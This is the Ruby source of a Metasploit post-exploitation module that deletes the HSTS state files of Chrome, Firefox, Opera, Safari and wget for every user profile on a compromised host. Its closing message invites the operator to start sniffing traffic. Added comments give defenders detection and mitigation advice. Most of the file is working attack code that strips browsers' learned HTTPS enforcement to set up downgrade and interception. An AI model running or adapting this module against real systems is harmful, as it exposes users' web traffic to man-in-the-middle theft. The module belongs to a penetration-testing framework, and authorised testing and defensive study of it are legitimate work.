
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/multi/manage/hsts_eraser.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
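# Post module that deletes the on-disk HSTS state files of Chrome, Firefox,
# Opera, Safari and wget for every user profile it can enumerate on the
# session host.
#
# Reviewer notes for defenders:
# - The files touched are listed in #hsts_db_paths_for. Deletion of one of
#   these files by a process other than the owning browser is an unusual
#   event and a reasonable thing to alert on.
# - These files hold HSTS policy learned from response headers. Hosts on a
#   browser's built-in preload list are enforced from the shipped list, not
#   from these files, so preloading is the mitigation that survives removal
#   of this state.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::OSX::System
  include Msf::Post::Unix

  # Registers the module metadata and the DISCLAIMER option, which defaults
  # to false and must be set by the operator before #run deletes anything.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Web browsers HSTS entries eraser',
        'Description' => %q{
          This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
          Google Chrome, Opera, Safari and wget.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
        ],
        'Platform' => %w[linux osx unix win],
        'Arch' => [ARCH_X86, ARCH_X64],
        'References' => [
          [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
          [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
        ],
        'SessionTypes' => %w[meterpreter shell]
      )
    )

    register_options([
      OptBool.new('DISCLAIMER',
                  [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
    ])
  end

  # Deletes every HSTS state file found for every enumerated user profile.
  #
  # Nothing is touched unless DISCLAIMER is exactly +true+. The closing
  # message reflects whether any file was actually found and handed to
  # file_rm; the original printed the success line unconditionally, which
  # misreported runs where no profile or no database existed.
  def run
    # Strict comparison on purpose: any value other than boolean true keeps
    # the destructive path closed.
    unless datastore['DISCLAIMER'] == true
      print_error('This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.')
      return
    end

    removed = 0

    user_profiles.each do |user_profile|
      account = user_profile['UserName']

      hsts_db_paths_for(user_profile).each_pair do |browser, path|
        # For Firefox the table only holds the profiles directory; resolve it
        # to the state file of the first matching profile (or nil).
        path = firefox_hsts_db(path) if browser == 'Firefox'
        next if path.nil? || !file?(path)

        print_status "Removing #{browser} HSTS database for #{account}... "
        file_rm(path)
        removed += 1
      end
    end

    if removed.zero?
      print_status 'No HSTS databases were found; nothing was removed.'
    else
      print_status 'HSTS databases removed! Now enjoy your favorite sniffer! ;-)'
    end
  end

  # Builds the browser => path table for one user profile on the session's
  # platform.
  #
  # The 'Firefox' entry is the profiles directory, not a file; see
  # #firefox_hsts_db. On unix/linux 'LocalAppData' is the user's home
  # directory (see #user_profiles).
  #
  # @param user_profile [Hash] entry produced by #user_profiles
  # @return [Hash{String => String}] empty when the platform is not recognized
  def hsts_db_paths_for(user_profile)
    local = user_profile['LocalAppData']
    roaming = user_profile['AppData']

    case session.platform
    when 'windows'
      {
        'Chrome' => "#{local}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
        'Firefox' => "#{roaming}\\Mozilla\\Firefox\\Profiles",
        'Opera' => "#{roaming}\\Opera Software\\Opera Stable\\TransportSecurity"
      }
    when 'unix', 'linux'
      {
        'Chrome' => "#{local}/.config/google-chrome/Default/TransportSecurity",
        'Firefox' => "#{local}/.mozilla/firefox",
        'Opera' => "#{local}/.config/opera/TransportSecurity",
        'wget' => "#{local}/.wget-hsts"
      }
    when 'osx'
      {
        'Chrome' => "#{local}/Google/Chrome/Default/TransportSecurity",
        'Firefox' => "#{local}/Firefox/Profiles",
        'Opera' => "#{local}/com.operasoftware.Opera/TransportSecurity",
        'Safari' => "#{roaming}/Cookies/HSTS.plist"
      }
    else
      print_error "Platform not recognized: #{session.platform}"
      {}
    end
  end

  # Resolves a Firefox profiles directory to the SiteSecurityServiceState.txt
  # path inside the first listed profile whose name contains ".default".
  #
  # @param profiles_dir [String] Firefox profiles directory for one user
  # @return [String, nil] nil when the directory or a matching profile is absent
  def firefox_hsts_db(profiles_dir)
    return nil unless directory?(profiles_dir)

    default_profile = dir(profiles_dir).find do |entry|
      !%w[. ..].include?(entry) && entry.match?(/\.default/)
    end
    return nil unless default_profile

    [profiles_dir, default_profile, 'SiteSecurityServiceState.txt'].join(system_separator)
  end

  # Enumerates user profiles on the session host.
  #
  # unix/linux: one entry per name under /home, with 'LocalAppData' set to the
  # home directory. osx: one entry per name printed by `ls /Users` except
  # 'Shared'. windows: whatever grab_user_profiles returns.
  #
  # @return [Array<Hash>] empty (after printing an error) on other platforms
  def user_profiles
    profiles = []

    case session.platform
    when /unix|linux/
      dir('/home').reject { |name| %w[. ..].include?(name) }.each do |user_name|
        profiles.push('UserName' => user_name, 'LocalAppData' => "/home/#{user_name}")
      end
    when /osx/
      # NOTE(review): split breaks on any whitespace, so an account directory
      # with a space in its name yields two bogus entries; confirm if relevant.
      listed = session.shell_command('ls /Users').split
      listed.reject { |name| name == 'Shared' }.each do |user_name|
        profiles.push(
          'UserName' => user_name,
          'AppData' => "/Users/#{user_name}/Library",
          'LocalAppData' => "/Users/#{user_name}/Library/Application Support"
        )
      end
    when /windows/
      profiles |= grab_user_profiles
    else
      print_error 'Error getting user profile data!'
    end

    profiles
  end

  # Path separator of the session's platform.
  #
  # @return [String] backslash on windows, forward slash otherwise
  def system_separator
    session.platform == 'windows' ? '\\' : '/'
  end
end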